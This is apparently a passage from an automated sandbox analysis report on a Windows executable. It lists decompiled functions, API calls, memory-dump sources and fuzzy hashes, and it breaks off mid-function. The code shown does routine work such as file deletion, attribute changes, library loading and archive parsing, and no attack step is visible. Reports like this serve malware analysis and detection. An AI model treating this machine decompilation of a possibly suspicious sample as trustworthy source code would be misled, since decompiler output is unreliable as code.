                                              • Part of subcall function 00C57A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C52FA6,?,0000015D,?,?,?,?,00C54482,000000FF,00000000,?,?), ref: 00C57ABC
                                            • RtlReAllocateHeap.NTDLL(00000000,?,?,?,?,00C700E0,00C3CB18,?,?,?,?,?,?), ref: 00C57BD5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AllocateHeap$_free
                                            • String ID:
                                            • API String ID: 1482568997-0
                                            • Opcode ID: cbfb7697689b9ebee5c641ae3101d9bf6ed92f17828c8e71e64a66b20d65483d
                                            • Instruction ID: aa85226a0fdd6626fab4b4c24f9296c2b0ec11aed54beefbce22889a44a38831
                                            • Opcode Fuzzy Hash: cbfb7697689b9ebee5c641ae3101d9bf6ed92f17828c8e71e64a66b20d65483d
                                            • Instruction Fuzzy Hash: D8F0623A6081156BDF213A26BC45F6F3758DF91BB3B150356FC28A6190DB20DAC8A1AD
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C40574, Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C40574(void* __ecx) {
				long _v8;
				long _v12;
				int _t8;
				void* _t14;
				signed int _t15;
				signed int _t17;

				_t8 = GetProcessAffinityMask(GetCurrentProcess(),  &_v8,  &_v12); // executed
				if(_t8 == 0) {
					return _t8 + 1;
				}
				_t14 = 0;
				_t17 = _v8;
				_t15 = 1;
				do {
					if((_t17 & _t15) != 0) {
						_t14 = _t14 + 1;
					}
					_t15 = _t15 + _t15;
				} while (_t15 != 0);
				if(_t14 >= 1) {
					return _t14;
				}
				return 1;
			}









                                            0x00c40588
                                            0x00c40590
                                            0x00000000
                                            0x00c40592
                                            0x00c40597
                                            0x00c4059b
                                            0x00c4059e
                                            0x00c405a0
                                            0x00c405a2
                                            0x00c405a4
                                            0x00c405a4
                                            0x00c405a5
                                            0x00c405a5
                                            0x00c405ac
                                            0x00000000
                                            0x00c405ae
                                            0x00c405b3

                                            APIs
                                            • GetCurrentProcess.KERNEL32(?,?), ref: 00C40581
                                            • GetProcessAffinityMask.KERNEL32(00000000), ref: 00C40588
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Process$AffinityCurrentMask
                                            • String ID:
                                            • API String ID: 1231390398-0
                                            • Opcode ID: eecb07ffadd575a73062a6e07e9b0a4405ccba390ffe2e4319373fe666ab73ee
                                            • Instruction ID: fc7185586f3db56c83652eb60457ce525259d1762d20f5c0c413b810368247a2
                                            • Opcode Fuzzy Hash: eecb07ffadd575a73062a6e07e9b0a4405ccba390ffe2e4319373fe666ab73ee
                                            • Instruction Fuzzy Hash: E9E09232E50609AB9F1896A59C059AF77ADFA48301B30517AEA12D3300F934EE014FB8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C3A12F, Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 82%
                                            			E00C3A12F(WCHAR* _a4, long _a8) {
				short _v4100;
				int _t12;
				signed int _t18;
				signed int _t19;

				E00C4D940();
				_push(_t18);
				_t12 = SetFileAttributesW(_a4, _a8); // executed
				_t19 = _t18 & 0xffffff00 | _t12 != 0x00000000;
				if(_t19 == 0 && E00C3B32C(_a4,  &_v4100, 0x800) != 0) {
					_t19 = _t19 & 0xffffff00 | SetFileAttributesW( &_v4100, _a8) != 0x00000000;
				}
				return _t19;
			}







                                            0x00c3a137
                                            0x00c3a13c
                                            0x00c3a143
                                            0x00c3a14b
                                            0x00c3a150
                                            0x00c3a17c
                                            0x00c3a17c
                                            0x00c3a185

                                            APIs
                                            • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00C39F65,?,?,?,00C39DFE,?,00000001,00000000,?,?), ref: 00C3A143
                                            • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00C39F65,?,?,?,00C39DFE,?,00000001,00000000,?,?), ref: 00C3A174
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: aa828d7648efc02786b2174a8d69c7d291f00617cb5fb1a11cb50833ea2c4a4b
                                            • Instruction ID: b46ac3610253db9f0ace68f7c44365e7941be8d77dc0009d79ee554e49579dfb
                                            • Opcode Fuzzy Hash: aa828d7648efc02786b2174a8d69c7d291f00617cb5fb1a11cb50833ea2c4a4b
                                            • Instruction Fuzzy Hash: B3F0A031150109ABDF116F61DC00BEE376CBB04381F448051FC9C96161DB72CEA9EB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4CB57, Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ItemText_swprintf
                                            • String ID:
                                            • API String ID: 3011073432-0
                                            • Opcode ID: e206a0f47f2920bbcd3b9b16b74cfadc9ab24120e2e59bd36e99e90494c371c8
                                            • Instruction ID: 1238a2b9a11ddf83ed88d8adb0387d4c3acca84fd2962d5cacf946cdb0059b5f
                                            • Opcode Fuzzy Hash: e206a0f47f2920bbcd3b9b16b74cfadc9ab24120e2e59bd36e99e90494c371c8
                                            • Instruction Fuzzy Hash: C0F0EC3190934C37DB11AB719C47F9D3B5CE704781F040495BA05521B2E5715B605762
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C39E18, Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 82%
                                            			E00C39E18(WCHAR* _a4) {
				short _v4100;
				int _t10;
				signed int _t16;
				signed int _t17;

				E00C4D940();
				_push(_t16);
				_t10 = DeleteFileW(_a4); // executed
				_t17 = _t16 & 0xffffff00 | _t10 != 0x00000000;
				if(_t17 == 0 && E00C3B32C(_a4,  &_v4100, 0x800) != 0) {
					_t17 = _t17 & 0xffffff00 | DeleteFileW( &_v4100) != 0x00000000;
				}
				return _t17;
			}







                                            0x00c39e20
                                            0x00c39e25
                                            0x00c39e29
                                            0x00c39e31
                                            0x00c39e36
                                            0x00c39e5f
                                            0x00c39e5f
                                            0x00c39e68

                                            APIs
                                            • DeleteFileW.KERNELBASE(?,?,?,00C39648,?,?,00C394A3), ref: 00C39E29
                                            • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00C39648,?,?,00C394A3), ref: 00C39E57
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: DeleteFile
                                            • String ID:
                                            • API String ID: 4033686569-0
                                            • Opcode ID: 1c461d84cc5fac844e2961bccb98357c5e5bb078766ef6c11576b0de94b7779e
                                            • Instruction ID: 6d334fb854365dbd3107d0cf86d73ef49ef5805844c53c580523064b6ed0f722
                                            • Opcode Fuzzy Hash: 1c461d84cc5fac844e2961bccb98357c5e5bb078766ef6c11576b0de94b7779e
                                            • Instruction Fuzzy Hash: BEE022302512086BDB11AF21DC00FE9335CEB083C2F884062F888C3161DFB2CD94EA60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C39E7F, Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C39E7F(WCHAR* _a4) {
				short _v4100;
				long _t6;
				long _t11;
				long _t13;

				E00C4D940();
				_t6 = GetFileAttributesW(_a4); // executed
				_t13 = _t6;
				if(_t13 == 0xffffffff && E00C3B32C(_a4,  &_v4100, 0x800) != 0) {
					_t11 = GetFileAttributesW( &_v4100); // executed
					_t13 = _t11;
				}
				return _t13;
			}







                                            0x00c39e87
                                            0x00c39e90
                                            0x00c39e96
                                            0x00c39e9b
                                            0x00c39ebc
                                            0x00c39ec2
                                            0x00c39ec2
                                            0x00c39eca

                                            APIs
                                            • GetFileAttributesW.KERNELBASE(?,?,?,00C39E74,?,00C374F7,?,?,?,?), ref: 00C39E90
                                            • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00C39E74,?,00C374F7,?,?,?,?), ref: 00C39EBC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AttributesFile
                                            • String ID:
                                            • API String ID: 3188754299-0
                                            • Opcode ID: 4a5a10ba16583c08987702883e05a0945eaf0c338ffff2cc41040ee0fcda8713
                                            • Instruction ID: 6c080113ea288d0d899bdceb4497abd478046a4af8c76146376836517b8da917
                                            • Opcode Fuzzy Hash: 4a5a10ba16583c08987702883e05a0945eaf0c338ffff2cc41040ee0fcda8713
                                            • Instruction Fuzzy Hash: 80E09B3251012867CB20BB64DC04BD9775CEB083E1F004161FD55E31D1DBB19D459AD0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C3FCFD, Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C3FCFD(intOrPtr _a4) {
				short _v4100;
				struct HINSTANCE__* _t7;

				E00C4D940();
				_t7 = GetSystemDirectoryW( &_v4100, 0x800);
				if(_t7 != 0) {
					E00C3B625( &_v4100, _a4,  &_v4100, 0x800);
					_t7 = LoadLibraryW( &_v4100); // executed
				}
				return _t7;
			}





                                            0x00c3fd05
                                            0x00c3fd18
                                            0x00c3fd20
                                            0x00c3fd2e
                                            0x00c3fd3a
                                            0x00c3fd3a
                                            0x00c3fd44

                                            APIs
                                            • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C3FD18
                                            • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00C3E7F6,Crypt32.dll,?,00C3E878,?,00C3E85C,?,?,?,?), ref: 00C3FD3A
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: DirectoryLibraryLoadSystem
                                            • String ID:
                                            • API String ID: 1175261203-0
                                            • Opcode ID: 18a04df20e619f9db9c4db624bb07bc57bdac8bcd7f489b2d9231ff8d0089930
                                            • Instruction ID: 6c57a83016d28d9a36eeddd921d45c0e843f0e6ecdd49f34260ee023035a0aa8
                                            • Opcode Fuzzy Hash: 18a04df20e619f9db9c4db624bb07bc57bdac8bcd7f489b2d9231ff8d0089930
                                            • Instruction Fuzzy Hash: 2EE0487691411C6BDB21AB95DC09FEA776CFF0C392F4400A6B948D2005DEB4DA40CBF0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4938E, Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 73%
                                            			E00C4938E(signed int __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _t10;
				signed int _t15;

				_push(__ecx);
				_t15 = __ecx;
				_t10 =  &_v8;
				_v8 = __ecx;
				_v8 = _v8 & 0x00000000;
				_push(_t10);
				_push(_a4);
				 *__ecx = 0xc63398;
				if(_a8 == 0) {
					L00C4D80E(); // executed
				} else {
					L00C4D814();
				}
				 *((intOrPtr*)(_t15 + 8)) = _t10;
				 *(_t15 + 4) = _v8;
				return _t15;
			}






                                            0x00c49391
                                            0x00c49393
                                            0x00c49395
                                            0x00c49398
                                            0x00c4939b
                                            0x00c493a3
                                            0x00c493a4
                                            0x00c493a7
                                            0x00c493ad
                                            0x00c493b6
                                            0x00c493af
                                            0x00c493af
                                            0x00c493af
                                            0x00c493bb
                                            0x00c493c1
                                            0x00c493ca

                                            APIs
                                            • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00C493AF
                                            • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00C493B6
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: BitmapCreateFromGdipStream
                                            • String ID:
                                            • API String ID: 1918208029-0
                                            • Opcode ID: b2da6457ae4381082c4992d7c2090951b3989e38fd791e4df130ec44d6b8dc01
                                            • Instruction ID: 7501407172425cf86c4197d60aead1e9f731b56c9201249f567ad2bc9a65ea87
                                            • Opcode Fuzzy Hash: b2da6457ae4381082c4992d7c2090951b3989e38fd791e4df130ec44d6b8dc01
                                            • Instruction Fuzzy Hash: 71E0ED71905228EFCB20EF99C5456AABBF8FB05321F10805AE85593751E771AF04ABA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C49B08, Relevance: 3.0, APIs: 2, Instructions: 22comCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E00C49B08(void* __ecx) {
				intOrPtr _v16;
				intOrPtr* _t5;
				void* _t7;
				void* _t11;
				intOrPtr _t14;

				 *[fs:0x0] = _t14;
				_t5 =  *0xc775c0; // 0x763cc100
				 *((intOrPtr*)( *_t5 + 8))(_t5, _t11,  *[fs:0x0], E00C61161, 0xffffffff);
				L00C4D826(); // executed
				_t7 =  *0xc6dff0( *((intOrPtr*)(__ecx + 4))); // executed
				 *[fs:0x0] = _v16;
				return _t7;
			}








                                            0x00c49b19
                                            0x00c49b20
                                            0x00c49b2b
                                            0x00c49b31
                                            0x00c49b36
                                            0x00c49b3f
                                            0x00c49b4a

                                            APIs
                                            • GdiplusShutdown.GDIPLUS(?,?,?,00C61161,000000FF), ref: 00C49B31
                                            • OleUninitialize.OLE32(?,?,?,00C61161,000000FF), ref: 00C49B36
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: GdiplusShutdownUninitialize
                                            • String ID:
                                            • API String ID: 3856339756-0
                                            • Opcode ID: 762097aef8bef8e8ecc36a72487ab9b78cf55eae47984a215ce793ae47be5e5d
                                            • Instruction ID: 02318d3ab17927783af3355f740289279e04a2696ee666f1e616a8641091c99a
                                            • Opcode Fuzzy Hash: 762097aef8bef8e8ecc36a72487ab9b78cf55eae47984a215ce793ae47be5e5d
                                            • Instruction Fuzzy Hash: 58E04F32A48644DFC720DF88DC46B5AB7E8FB09B20F04476AF91A83B90CB756800CBD1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C51726, Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 89%
                                            			E00C51726(void* __ecx, void* __eflags) {
				intOrPtr _t1;
				void* _t2;
				void* _t9;

				_t1 = E00C5281A(__eflags, E00C5166A); // executed
				 *0xc6d680 = _t1;
				if(_t1 != 0xffffffff) {
					_t2 = E00C528C8(__eflags, _t1, 0xc901dc);
					_pop(_t9);
					__eflags = _t2;
					if(_t2 != 0) {
						return 1;
					} else {
						E00C51759(_t9);
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}






                                            0x00c5172b
                                            0x00c51730
                                            0x00c51739
                                            0x00c51744
                                            0x00c5174a
                                            0x00c5174b
                                            0x00c5174d
                                            0x00c51758
                                            0x00c5174f
                                            0x00c5174f
                                            0x00000000
                                            0x00c5174f
                                            0x00c5173b
                                            0x00c5173b
                                            0x00c5173d
                                            0x00c5173d

                                            APIs
                                              • Part of subcall function 00C5281A: try_get_function.LIBVCRUNTIME ref: 00C5282F
                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C51744
                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00C5174F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                            • String ID:
                                            • API String ID: 806969131-0
                                            • Opcode ID: 20b196b656c04beb87e3ed207dc2e99fab88e05f316aa41b6e7d1bbd650f26e7
                                            • Instruction ID: 8318847b5d5b5bc0a9ee78e283e224657650760a48db23ad09d2ecf7c5dbeecd
                                            • Opcode Fuzzy Hash: 20b196b656c04beb87e3ed207dc2e99fab88e05f316aa41b6e7d1bbd650f26e7
                                            • Instruction Fuzzy Hash: F9D0A72DA44301084D002AB9681A749178485167F37B84A55FC308A0C3EE2080CDB42D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C312B2, Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 58%
                                            			E00C312B2(struct HWND__* _a4, int _a8, signed char _a12) {
				int _t8;

				asm("sbb eax, eax");
				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
				return _t8;
			}




                                            0x00c312b9
                                            0x00c312ce
                                            0x00c312d4

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ItemShowWindow
                                            • String ID:
                                            • API String ID: 3351165006-0
                                            • Opcode ID: 7ff5fb05df1edbfd98d640f6ee31fa24efa7b1dc32dbd770bb1463b6816f8851
                                            • Instruction ID: 4fb77ebf89a3a3c5c353287a4bdf6d25365ae0550fc0025a49ca2ad0b3387f3c
                                            • Opcode Fuzzy Hash: 7ff5fb05df1edbfd98d640f6ee31fa24efa7b1dc32dbd770bb1463b6816f8851
                                            • Instruction Fuzzy Hash: ABC01272A58202BECB011BB2DC09F2EBBA8ABA4212F04C908F0A7C00A0C678C010DB12
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C31973, Relevance: 1.8, APIs: 1, Instructions: 285COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 95%
                                            			E00C31973(intOrPtr* __ecx, intOrPtr __edx) {
				signed int _t106;
				intOrPtr _t109;
				signed int _t110;
				signed int _t112;
				signed int _t116;
				signed int _t119;
				signed int _t127;
				intOrPtr _t128;
				char _t129;
				char _t138;
				intOrPtr _t143;
				signed int _t144;
				signed int _t145;
				void* _t147;
				signed int _t152;
				signed int _t153;
				signed int _t155;
				void* _t159;
				void* _t160;
				signed int _t166;
				intOrPtr* _t169;
				signed int _t175;
				void* _t176;
				signed int _t178;
				char* _t190;
				intOrPtr _t191;
				intOrPtr _t197;
				intOrPtr* _t199;
				signed int _t202;
				void* _t204;
				char* _t205;
				intOrPtr _t206;
				void* _t207;

				_t197 = __edx;
				_t169 = __ecx;
				E00C4D870(E00C61451, _t207);
				_t199 = _t169;
				_push(7);
				_t164 = _t199 + 0x21f8;
				_push(_t199 + 0x21f8);
				 *((char*)(_t199 + 0x6cbc)) = 0;
				 *((char*)(_t199 + 0x6cc4)) = 0;
				if( *((intOrPtr*)( *_t199 + 0xc))() == 7) {
					 *(_t199 + 0x6cc0) =  *(_t199 + 0x6cc0) & 0x00000000;
					_t106 = E00C31D09(_t164, 7);
					__eflags = _t106;
					if(_t106 == 0) {
						E00C36ED7(_t207 - 0x38, 0x200000);
						 *(_t207 - 4) =  *(_t207 - 4) & 0x00000000;
						_t109 =  *((intOrPtr*)( *_t199 + 0x14))();
						_t197 =  *_t199;
						 *((intOrPtr*)(_t207 - 0x18)) = _t109;
						_t110 =  *((intOrPtr*)(_t197 + 0xc))( *((intOrPtr*)(_t207 - 0x38)),  *((intOrPtr*)(_t207 - 0x34)) + 0xfffffff0);
						_t175 = _t110;
						_t202 = 0;
						 *(_t207 - 0x14) = _t175;
						_t166 = 1;
						__eflags = _t175;
						if(_t175 <= 0) {
							L22:
							__eflags =  *(_t199 + 0x6cc0);
							_t176 = _t207 - 0x38;
							if( *(_t199 + 0x6cc0) != 0) {
								_t37 = _t207 - 4; // executed
								 *_t37 =  *(_t207 - 4) | 0xffffffff;
								__eflags =  *_t37;
								E00C3159C(_t176); // executed
								L25:
								_t112 =  *(_t199 + 0x6cb0);
								__eflags = _t112 - 4;
								if(__eflags != 0) {
									__eflags = _t112 - 3;
									if(_t112 != 3) {
										 *((intOrPtr*)(_t199 + 0x2200)) = 7;
										L32:
										 *((char*)(_t207 - 0xd)) = 0;
										__eflags = E00C3391A(_t199, _t197);
										 *(_t207 - 0xe) = 0;
										__eflags = 0 - 1;
										if(0 != 1) {
											L38:
											_t116 =  *((intOrPtr*)(_t207 - 0xd));
											L39:
											_t178 =  *((intOrPtr*)(_t199 + 0x6cc5));
											__eflags = _t178;
											if(_t178 == 0) {
												L41:
												__eflags =  *((char*)(_t199 + 0x6cc4));
												if( *((char*)(_t199 + 0x6cc4)) != 0) {
													L43:
													__eflags = _t178;
													if(__eflags == 0) {
														E00C3134C(__eflags, 0x1b, _t199 + 0x1e);
													}
													__eflags =  *((char*)(_t207 + 8));
													if( *((char*)(_t207 + 8)) != 0) {
														L48:
														__eflags =  *(_t207 - 0xe);
														 *((char*)(_t199 + 0x6cb6)) =  *((intOrPtr*)(_t199 + 0x2224));
														if( *(_t207 - 0xe) == 0) {
															L69:
															__eflags =  *((char*)(_t199 + 0x6cb5));
															if( *((char*)(_t199 + 0x6cb5)) == 0) {
																L71:
																E00C3FAB1(_t199 + 0x6cfa, _t199 + 0x1e, 0x800);
																L72:
																_t119 = _t166;
																goto L73;
															}
															__eflags =  *((char*)(_t199 + 0x6cb9));
															if( *((char*)(_t199 + 0x6cb9)) == 0) {
																goto L72;
															}
															goto L71;
														}
														__eflags =  *((char*)(_t199 + 0x21e0));
														if( *((char*)(_t199 + 0x21e0)) == 0) {
															L51:
															_t204 =  *((intOrPtr*)( *_t199 + 0x14))();
															 *((intOrPtr*)(_t207 - 0x24)) = _t197;
															 *((intOrPtr*)(_t207 + 8)) =  *((intOrPtr*)(_t199 + 0x6ca0));
															 *((intOrPtr*)(_t207 - 0x18)) =  *((intOrPtr*)(_t199 + 0x6ca4));
															 *(_t207 - 0x14) =  *(_t199 + 0x6ca8);
															 *((intOrPtr*)(_t207 - 0x1c)) =  *((intOrPtr*)(_t199 + 0x6cac));
															 *((intOrPtr*)(_t207 - 0x20)) =  *((intOrPtr*)(_t199 + 0x21dc));
															while(1) {
																_t127 = E00C3391A(_t199, _t197);
																__eflags = _t127;
																if(_t127 == 0) {
																	break;
																}
																_t128 =  *((intOrPtr*)(_t199 + 0x21dc));
																__eflags = _t128 - 3;
																if(_t128 != 3) {
																	__eflags = _t128 - 2;
																	if(_t128 == 2) {
																		__eflags =  *((char*)(_t199 + 0x6cb5));
																		if( *((char*)(_t199 + 0x6cb5)) == 0) {
																			L66:
																			_t129 = 0;
																			__eflags = 0;
																			L67:
																			 *((char*)(_t199 + 0x6cb9)) = _t129;
																			L68:
																			 *((intOrPtr*)(_t199 + 0x6ca0)) =  *((intOrPtr*)(_t207 + 8));
																			 *((intOrPtr*)(_t199 + 0x6ca4)) =  *((intOrPtr*)(_t207 - 0x18));
																			 *(_t199 + 0x6ca8) =  *(_t207 - 0x14);
																			 *((intOrPtr*)(_t199 + 0x6cac)) =  *((intOrPtr*)(_t207 - 0x1c));
																			 *((intOrPtr*)(_t199 + 0x21dc)) =  *((intOrPtr*)(_t207 - 0x20));
																			 *((intOrPtr*)( *_t199 + 0x10))(_t204,  *((intOrPtr*)(_t207 - 0x24)), 0);
																			goto L69;
																		}
																		__eflags =  *((char*)(_t199 + 0x3318));
																		if( *((char*)(_t199 + 0x3318)) != 0) {
																			goto L66;
																		}
																		_t129 = _t166;
